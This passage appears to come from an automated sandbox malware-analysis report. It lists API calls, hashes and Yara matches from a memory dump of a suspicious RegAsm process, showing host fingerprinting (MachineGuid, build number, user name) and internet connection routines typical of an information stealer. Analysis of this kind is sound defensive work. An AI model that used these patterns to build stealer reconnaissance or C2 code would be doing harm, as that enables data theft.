                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy
                                                                                                                                                                                                                                                    • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                    • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                    • Opcode ID: d6cc198eb1c429e220fe2e1bd9c060a5aad79b8f1d82a8dc58e4fbce93d8bd0b
                                                                                                                                                                                                                                                    • Instruction ID: cc82b531287d5df431aabb217240873c998d12782e394e685e5aa2abd0f1351a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6cc198eb1c429e220fe2e1bd9c060a5aad79b8f1d82a8dc58e4fbce93d8bd0b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB225C74900748DFCB24EFA9C545ADEBBF5BF48304F10856EE846A3791D734AA08CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: LoadLibraryA.KERNEL32(kernel32.dll,004180E0), ref: 004181D5
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(00000000,015BF468), ref: 004181F0
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF1F8), ref: 0041821D
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF210), ref: 00418236
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF1E0), ref: 0041824E
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF480), ref: 00418266
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015C2F60), ref: 0041827F
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015C29E0), ref: 00418297
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015C2C20), ref: 004182AF
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF4B0), ref: 004182C8
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF498), ref: 004182E0
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF4C8), ref: 004182F8
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF528), ref: 00418311
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015C2A80), ref: 00418329
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF540), ref: 00418341
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF4E0), ref: 0041835A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004180F2,004271B6), ref: 004100DC
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: HeapAlloc.KERNEL32(00000000,?,?,?,004180F2,004271B6), ref: 004100E3
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: GetUserNameA.ADVAPI32(00000000,004271B6), ref: 004100F7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015C2E10,?,00427610,?,00000000,004271B6), ref: 00418152
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418161
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001B58), ref: 0041816C
                                                                                                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418182
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041819C
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004181AA
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004181B2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocCreateExitLibraryLoadNameSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3002421637-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                    • API String ID: 1274457161-4251816714
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410B05
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410B22
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410B44
                                                                                                                                                                                                                                                    • CharToOemA.USER32(00000000,?), ref: 00410B62
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                    • API String ID: 1728412123-1211650757
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004272C0,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272AC), ref: 0041053E
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004272C0,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272AC,00000000), ref: 00410545
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410565
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041058B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                    • String ID: %d MB$@
                                                                                                                                                                                                                                                    • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                    • Opcode ID: 738daf5a307f83ddde426ce036faced930f102602c3dcf932ed6168948fa4945
                                                                                                                                                                                                                                                    • Instruction ID: ccaa2b2334dd3301b9f1694f37eece0538fd2250e3a8930f87bfe493a029b71b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 738daf5a307f83ddde426ce036faced930f102602c3dcf932ed6168948fa4945
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F09671A50228ABE704DBE4DC0AFBE776EEB05700F400119FB06E32D0DBB89C4187A9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E01
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2311089104-0
                                                                                                                                                                                                                                                    • Opcode ID: 5d6a5b90a9eee9abc2f959ea74a4d764c3b013cc9b6044d5e27185051cc21f1c
                                                                                                                                                                                                                                                    • Instruction ID: ddce288ef91ee69b99d2a51aa9964d65ee04ec79e2e3031f151b74944cc7f0b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d6a5b90a9eee9abc2f959ea74a4d764c3b013cc9b6044d5e27185051cc21f1c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75216D75A00216AFEB10DFA4DC84FAB7769EB05714F10023AF912A76D0D7349D51CBE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DA5
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00410DAC
                                                                                                                                                                                                                                                      • Part of subcall function 00410050: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410065
                                                                                                                                                                                                                                                      • Part of subcall function 00410050: HeapAlloc.KERNEL32(00000000), ref: 0041006C
                                                                                                                                                                                                                                                      • Part of subcall function 00410050: RegOpenKeyExA.KERNEL32(80000002,015CB448,00000000,00020119,?), ref: 0041008B
                                                                                                                                                                                                                                                      • Part of subcall function 00410050: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004100A5
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,015CB448,00000000,00020119,00000000), ref: 00410DE1
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,015D2048,00000000,00000000,00000000,000000FF), ref: 00410DFC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID: Windows 11
                                                                                                                                                                                                                                                    • API String ID: 3676486918-2517555085
                                                                                                                                                                                                                                                    • Opcode ID: 2569570946bb202847a57fd16c0953e2cd1ca13bf3ab2bae79daa6a8b006453a
                                                                                                                                                                                                                                                    • Instruction ID: eea5cb9f473cbd8849c3050f987e838f7784a14057610812035ee29dda7ad254
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2569570946bb202847a57fd16c0953e2cd1ca13bf3ab2bae79daa6a8b006453a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8101F278601219FBEB10DBE4ED09FAA777DEB05705F004169FE04D3240D6B4994087A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00416DE1
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,015D19C8,00000000,00020119,004226A8), ref: 00416E00
                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(004226A8,015D2228,00000000,00000000,?,000000FF), ref: 00416E24
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416E53
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D2300), ref: 00416E67
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$OpenQueryValuememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 558315959-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2CC0), ref: 00418525
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2CE0), ref: 0041853D
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD960), ref: 00418556
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD9F0), ref: 0041856E
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CDA50), ref: 00418586
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD8D0), ref: 0041859F
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C3EE0), ref: 004185B7
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD948), ref: 004185CF
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD9A8), ref: 004185E8
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD9D8), ref: 00418600
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CDAB0), ref: 00418618
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2B20), ref: 00418631
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2640), ref: 00418649
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2680), ref: 00418661
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2940), ref: 0041867A
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CDA80), ref: 00418692
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417B06
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417B1D
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C18
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetVolumeInformationA.KERNEL32(00421639,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C51
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410C9D
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: HeapAlloc.KERNEL32(00000000), ref: 00410CA4
                                                                                                                                                                                                                                                      • Part of subcall function 00404420: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044EA
                                                                                                                                                                                                                                                      • Part of subcall function 00404420: StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 0040450A
                                                                                                                                                                                                                                                      • Part of subcall function 00412650: StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417B94), ref: 00412688
                                                                                                                                                                                                                                                      • Part of subcall function 00412650: ExitProcess.KERNEL32 ref: 00412693
                                                                                                                                                                                                                                                      • Part of subcall function 00405BC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C8A
                                                                                                                                                                                                                                                      • Part of subcall function 00405BC0: StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 00405CAA
                                                                                                                                                                                                                                                      • Part of subcall function 004120D0: strtok_s.MSVCRT ref: 00412110
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00417EF5
                                                                                                                                                                                                                                                      • Part of subcall function 00405BC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405E34
                                                                                                                                                                                                                                                      • Part of subcall function 00413450: strtok_s.MSVCRT ref: 0041348E
                                                                                                                                                                                                                                                      • Part of subcall function 00413450: strtok_s.MSVCRT ref: 0041354B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$lstrcpy$Internet$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitInformationSleepVolumeWindows
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 518992629-3916222277
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6EC947
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C6EC969
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6EC9A9
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C6EC9C8
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C6EC9E2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4191843772-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00427870,00000000,00000001,00427090,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?), ref: 00410E3D
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00410E4C
                                                                                                                                                                                                                                                    • _wtoi64.MSVCRT ref: 00410E92
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00410EA8
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00410EAB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1817501562-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(015CF760,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,0041FE20,000000FF,?,0040BBB3,015D1E50), ref: 00407191
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(015CF760,00000000,00000000,?,0040BBB3,00426884,00426884,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0042687F,?,?,?,00000000,0041FE20,000000FF), ref: 0040720E
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D1908,?,?,?,00000000,0041FE20,000000FF,?,0040BBB3), ref: 00407226
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00407186, 004071A4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
